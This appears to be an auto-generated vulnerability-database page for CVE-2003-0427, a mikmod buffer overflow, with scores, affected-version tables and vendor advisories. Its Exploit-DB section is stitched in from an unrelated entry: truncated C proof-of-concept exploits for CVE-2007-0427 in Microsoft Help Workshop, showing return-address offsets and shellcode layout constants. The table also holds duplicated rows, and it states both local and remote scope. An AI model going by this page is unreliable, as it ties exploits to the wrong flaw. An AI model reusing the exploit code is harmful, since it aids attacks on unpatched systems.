CVE-2003-0427
Published 2003-07-24
CVE-2003-0427: Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute arbitrary code via an archive file that contains a file with a long filename.
Priority P427 · high · 7.5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS: 3.34% (87.1th percentile)
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | mikmod | < mikmod 3.1.6-6 (bookworm) | mikmod 3.1.6-6 (bookworm) |
| miod_vallat | mikmod | — | — |
| miod_vallat | mikmod | >= 0 < 3.1.6-6 | 3.1.6-6 |
| miod_vallat | mikmod | >= 0 < 3.1.6-6 | 3.1.6-6 |
| miod_vallat | mikmod | >= 0 < 3.1.6-6 | 3.1.6-6 |
| miod_vallat | mikmod | >= 0 < 3.1.6-6 | 3.1.6-6 |
CVSS provenance
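| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | HIGH | — |
| vendor_redhat | — | 7.5 | HIGH | — |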
Red Hat
security flaw
vendor_redhat·2003-06-13·CVSS 7.5
CVE-2003-0427 [HIGH] security flaw
Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute arbitrary code via an archive file that contains a file with a long filename.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Debian
CVE-2003-0427: mikmod - Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute a...
vendor_debian·2003·CVSS 7.5
CVE-2003-0427 [HIGH] CVE-2003-0427: mikmod - Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute a...
Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute arbitrary code via an archive file that contains a file with a long filename.
Scope: local
bookworm: resolved (fixed in 3.1.6-6)
bullseye: resolved (fixed in 3.1.6-6)
forky: resolved (fixed in 3.1.6-6)
sid: resolved (fixed in 3.1.6-6)
trixie: resolved (fixed in 3.1.6-6)
GHSA
GHSA-3mcf-r5g4-57jg: Buffer overflow in mikmod 3
ghsa_unreviewed·2022-04-29
CVE-2003-0427 [HIGH] GHSA-3mcf-r5g4-57jg: Buffer overflow in mikmod 3
Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute arbitrary code via an archive file that contains a file with a long filename.
OSV
CVE-2003-0427: Buffer overflow in mikmod 3
osv·2003-07-24·CVSS 7.5
CVE-2003-0427 [HIGH] CVE-2003-0427: Buffer overflow in mikmod 3
Buffer overflow in mikmod 3.1.6 and earlier allows remote attackers to execute arbitrary code via an archive file that contains a file with a long filename.
No detection rules found.
Exploit-DB
Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
exploitdb·2007-01-19
CVE-2007-0427 Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
---
```c
//*****************
//
// PoC exploit for .HPJ project files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0 and 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
#define STR01 "Microsoft Help Workshop PoC exploit by porkythepig"
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 671
#define PROC_NAM_SIZ 128
#define RET_OFFSET 0x14e
#define PROC_NAME_OFFSET 0x166
#define EXPRO_OFFSET 0xd9
#define GETSTAR_OFFSET 0x58
#define CREPRO_OFFSET 0xcf
#define GETWINDIR_OFFSET 0x73
typedef struct
{
    unsigned int extPro;
```
Exploit-DB
Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
exploitdb·2007-01-17
CVE-2007-0427 Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
---
```c
//*****************
//
// PoC exploit for .cnt files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0, 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
#define STR01 "0 Microsoft Help Workshop PoC exploit by porkythepig "
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 619
#define PROC_NAM_SIZ 66
#define RET_OFFSET 0x210
#define PROC_NAME_OFFSET 0x228
#define BACK_SEQ_OFFSET 0x218
#define EXPRO_OFFSET 0xbf
#define GETSTAR_OFFSET 0x4a
#define CREPRO_OFFSET 0xb5
#define GETWINDIR_OFFSET 0x65
typedef struct
{
```
http://www.debian.org/security/2003/dsa-320
http://www.redhat.com/support/errata/RHSA-2005-506.html
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10194
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A647
Published: 2003-07-24